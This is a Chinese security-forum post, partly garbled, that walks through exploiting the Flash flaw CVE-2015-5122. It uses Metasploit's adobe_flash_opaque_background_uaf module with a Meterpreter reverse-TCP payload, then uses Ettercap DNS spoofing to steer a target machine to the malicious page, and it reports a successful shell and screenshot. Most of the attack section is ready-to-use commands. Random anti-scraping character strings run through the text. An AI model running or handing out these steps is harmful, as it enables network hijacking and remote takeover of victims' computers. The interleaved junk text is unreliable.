中国网络渗透测试联盟

标题: cve2015-5122漏洞实例演示虚拟机 [打印本页]

作者: admin    时间: 2018-10-20 20:28
标题: cve2015-5122漏洞实例演示虚拟机

( h& }" ]2 H& U) Q. e) r- h. d. W, R 二、cve2015-5122漏洞实例演示虚拟机 ( k- F4 }+ `. \/ G/ _2 h- n2 n

9 J) ^$ r+ h3 s2 l/ L$ r

" G; w: D* B" Y- G+ `+ I, [" s   关于cve2015-5122这个漏洞,大家可以百度一下,是关于flash的漏洞,是2015flash漏洞的第二发,今天我们就用这个漏洞来演示,开启kai linux msfconsole命令启动msf如图: 9 h1 ^6 h; {% k8 f

/ g' Y2 f. s, U% U

) m" n2 z, k2 I& k! @ search cve-2015-5122如图: ) m6 E0 b& E* m0 @" w

1 \( S" F$ e0 U' M

6 O% u# g4 O0 S+ U3 e3 z/ Z" Y   " y0 y8 [# z" P. E$ C

1 V1 z& B( }0 i( f# s1 S( i8 P% _

0 }* u& n+ P5 B 下面我们敲如下命令: 0 {4 n! T; }) f. I

& {% r0 }7 |; O7 L1 H8 L- E

* R; f; j ~" r8 e/ V' u& b% s) ] use exploit/multi/browser/adobe_flash_opaque_background_uaf . ~/ ?' C& u. N& Y3 w& D

' E! }; N! k% C# s

6 C$ |; H0 Z3 |; ` set PAYLOAD windows/meterpreter/reverse_tcp . Z7 m7 Y* S4 T% D; f0 a) j' U" t

" f# N7 L2 _" M% N

! |6 T S' t" t3 @6 y3 _ set LHOST 192.168.0.109 8 Z4 v1 }3 r1 A8 A4 @

) ^2 d7 e m* N i) [0 m! q: \

; o% Y% I1 e* g8 J# Z% M. ^) N set URIPATH /                        /*根目录*/ 2 f% W1 m! l3 C; X! g

9 q8 t) z6 j. R- e8 N

# B* h" y, J4 U$ ]" v1 e( Z6 G6 @* H% k3 n set SRVHOST 192.168.0.109  //192.168.0.109kaili ip地址 c% [. E* j* }+ P, B

7 s4 a$ Y9 P8 i& X& W8 e, R

* n0 R/ C8 C, P set SRVPORT 80            /*80端口*/ 使用80端口时要保证apache为停止状态用service apache2 stop命令停止否则会提示端口被占用 2 i% a' B% l: E( Y6 ?

5 _1 m, d& F7 W; _+ Z" x T

3 E! a( r5 ?1 f" ^! g5 Z 然后show options如图: ( n0 a! |4 G: h4 q Z# U

' k! d Z0 D8 m4 p; C( k7 U

8 m6 J& Q, i c6 D1 b5 i+ D. p5 W   / f6 ~# H; y/ U& t/ y' [+ P

8 |- g7 N2 g" D5 Y; C

8 j7 S: h. B7 l5 z* D" I* y/ @ 一切都设置好了,执行exploit下面我们进etc/ettercap目录下设置etc.dns如图:
3 H6 U5 \$ ^" _8 Z+ N/ l
' j0 Z6 a& r: B1 p0 b( O5 x+ C4 h

N) e3 Q" |& M) W

0 L; d! {) ~& _- V7 L$ R 然后ettercap -G命令打开ettercap,我们要攻击的主机ip192.168.0115 + [* S" H' N, [" R J' [7 t, p

3 b. ^; \7 @1 D& Y

9 b3 ~) `8 j# | Ettercap过程第一篇里已经演示,这里不在详细写了。。。执行完ettercap以后我们观察一下msf 3 z$ l# J4 y6 d8 V0 ]6 D

! y7 f' C) u4 b r. @4 D

/ Z% l/ C; N9 L" e   : B: U ? ^9 z& M# L- N

5 ^1 N$ o7 ]! n8 [( @$ ~5 S: ~

8 x& r+ t6 x8 \1 ]; _" J* c4 z 成功了,这时候我们断开ettercap,如图: ' b! L$ }8 W- A' C) X& E# o

( J) D4 Q7 ^6 a' h" ?$ k ]

8 X3 q0 ~4 s w1 W! a( I+ ?9 {6 T+ @   ; x+ _9 ^( p a I' N; {' h( s

/ k' S% O e- w

! c, S( { W+ a Screenshot如图: - \% o: I/ L5 L1 J1 i( c: z, a

+ \5 c6 s' z! g4 R- S: @

+ Z* \* Y; X( Y: n+ F& [! ^ }   : a- x8 d# l; t; t4 n9 U

' g4 h$ i# k+ P2 o

+ \6 f R2 D p 5 m( j1 e8 T; f* l/ C& N' ~






欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/) Powered by Discuz! X3.2